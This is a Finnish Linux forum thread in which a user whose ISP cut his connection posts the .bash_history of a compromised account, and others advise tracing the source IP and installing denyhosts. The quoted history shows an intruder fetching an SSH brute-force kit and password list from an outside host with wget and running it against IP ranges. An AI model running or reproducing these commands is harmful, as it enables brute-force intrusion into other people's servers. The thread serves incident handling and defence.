Kirjoittaja Aihe: Haittaohjelma_SSH  (Luettu 2469 kertaa)

Leko

  • Käyttäjä
  • Viestejä: 337
    • Profiili
    • taistop.kapsi.fi
Haittaohjelma_SSH
« : 28.01.09 - klo:16.18 »
Netin tarjoilija pani yhteyteni kiinni. Syy se, että koneestani oli skannailtu ssh:lla runsaahkosti. Löytyi yksi murrettu käyttäjätunnus. Sen .bash_historia näyttää tältä:

Koodia: [Valitse]
w
cd .cbk
cd fhc
wget http://users.volja.net/passlists/fhc.tar.gz
tar -xzvf fhc.tar.gz
cd fhc
./start 84.244
wget http://users.volja.net/passlists/norrox.txt
mv norrox.txt pass_file
./start 128.39
./start 199.6;./start 204.79;./start 204.231;./start 205.248

Paketti on mulla vielä tallessa. Kertokaapa, kuka tai mikä taho olisi oikeasti kiinnostunut asiasta. Yst. vast. tänne tai privalla.

Tuplanolla

  • Käyttäjä
  • Viestejä: 1420
  • Reg. Linux user #423604
    • Profiili
Vs: Haittaohjelma_SSH
« Vastaus #1 : 28.01.09 - klo:16.45 »
Kannattaapi katsella mistä ip-osoitteista tälläinen on tullut.

Eli grep sshd <käyttäjänimi> /var/log/auth.log
Sieltä pitäisi löytyä rivejä tyyliin:
Lainaus
Jan 28 13:44:51 zeus sshd[15824]: Accepted password for joona from 192.168.0.102 port 1036 ssh2

Siitä poimit ip-osoitteen ja laitat päätteeseen että whois <ip-osoite>.
Sepä kertoo sitten mikä isp toisessa päässä on ja varmaan löytyy myös sähköpostiosoite mihin voi ottaa yhteyttä. Usein tyyliin abuse@isp.pääte.
Lisää [ratkaistu] ketjun ensimmäisen viestin otsikkoon, kun ongelma ratkeaa!

Leko

  • Käyttäjä
  • Viestejä: 337
    • Profiili
    • taistop.kapsi.fi
Vs: Haittaohjelma_SSH
« Vastaus #2 : 28.01.09 - klo:17.34 »
Tuoltapäin näyttää olevan, vaikka en minä mitään sillä tiedolla tee.

IP address   84.255.243.157
Hostname   84-255-243-157.static.t-2.net
ISP   T-2 Access Network
Country   Slovenia Slovenia

mgronber

  • Käyttäjä
  • Viestejä: 1458
    • Profiili
Vs: Haittaohjelma_SSH
« Vastaus #3 : 28.01.09 - klo:18.06 »
Netin tarjoilija pani yhteyteni kiinni. Syy se, että koneestani oli skannailtu ssh:lla runsaahkosti. Löytyi yksi murrettu käyttäjätunnus.

Ensi kerralla kannattaa laittaa koneelle denyhosts tai vastaava jotta skannailut eivät onnistu yhtä helposti.